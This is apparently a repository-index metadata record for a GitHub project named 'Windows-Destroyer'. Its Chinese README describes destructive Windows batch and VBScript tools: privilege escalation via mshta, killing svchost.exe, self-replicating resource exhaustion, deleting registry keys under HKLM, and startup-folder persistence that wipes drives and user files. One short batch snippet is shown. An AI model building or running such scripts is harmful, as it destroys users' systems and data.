{"id":26876783,"url":"https://github.com/jarocheng0123/windows-destroyer","last_synced_at":"2025-08-26T06:38:07.400Z","repository":{"id":285341043,"uuid":"957781276","full_name":"jarocheng0123/Windows-Destroyer","owner":"jarocheng0123","description":"权限提升、自我复制、强制结束系统进程","archived":false,"fork":false,"pushed_at":"2025-08-25T03:09:15.000Z","size":11,"stargazers_count":3,"open_issues_count":0,"forks_count":1,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-08-25T04:45:04.897Z","etag":null,"topics":["bat","microsoft-defender","vbs","windows"],"latest_commit_sha":null,"homepage":"","language":"VBScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jarocheng0123.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-03-31T05:50:33.000Z","updated_at":"2025-08-25T03:09:19.000Z","dependencies_parsed_at":"2025-03-31T07:23:23.576Z","dependency_job_id":"da0288ef-d317-4954-bc1e-f75395ef581c","html_url":"https://github.com/jarocheng0123/Windows-Destroyer","commit_stats":null,"previous_names":["jarocheng0123/windows-destroyer"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/jarocheng0123/Windows-Destroyer","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jarocheng0123%2FWindows-Destroyer","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jarocheng0123%2FWindows-Destroyer/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jarocheng0123%2FWindows-Destroyer/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jarocheng0123%2FWindows-Destroyer/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jarocheng0123","download_url":"https://codeload.github.com/jarocheng0123/Windows-Destroyer/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jarocheng0123%2FWindows-Destroyer/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":272186211,"owners_count":24888333,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-26T02:00:07.904Z","response_time":60,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bat","microsoft-defender","vbs","windows"],"created_at":"2025-03-31T11:16:57.823Z","updated_at":"2025-08-26T06:38:07.393Z","avatar_url":"https://github.com/jarocheng0123.png","language":"VBScript","funding_links":[],"categories":[],"sub_categories":[],"readme":"### 死机蓝屏：`system_crash.bat`\n1. **权限提升**：利用 `mshta` 和 VBScript 以管理员身份重新运行脚本。\n2. **进程破坏**：创建并执行 PowerShell 脚本，强制结束 `svchost.exe` 进程，导致系统不稳定。\n3. **资源耗尽**：通过自我复制和无限循环，耗尽系统资源。\n\n\n### 开机自启文件夹：`open_startup.vbs`\n```batch\n获取当前用户的启动文件夹路径并打开该文件夹，可能用于后续恶意脚本的植入。\n```\n\n\n### 删除注册表：`registry_delete.bat`\n1. **权限提升**：以管理员身份重新运行脚本。\n2. **注册表破坏**：强制删除注册表中 `HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion` 下的所有项，破坏系统配置。\n\n\n### 删除指定磁盘文件：`data_deletion.vbs`\n1. **持久化**：在当前用户的启动文件夹创建一个新的 VBScript 脚本。\n2. **数据删除**：新脚本会在系统启动时等待一段时间后，删除指定磁盘分区和用户目录下的所有文件和文件夹，并最终删除自身。\n\n\n## 蓝屏.bat\n```\n@echo off\nmkdir \"C:\\Windows\\system32\\config\\OSDATA\"\n```\n\n\n### 第2代脚本在测试过程中遇到的问题，可能在部分情况下无法运行","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjarocheng0123%2Fwindows-destroyer","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fjarocheng0123%2Fwindows-destroyer","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjarocheng0123%2Fwindows-destroyer/lists"}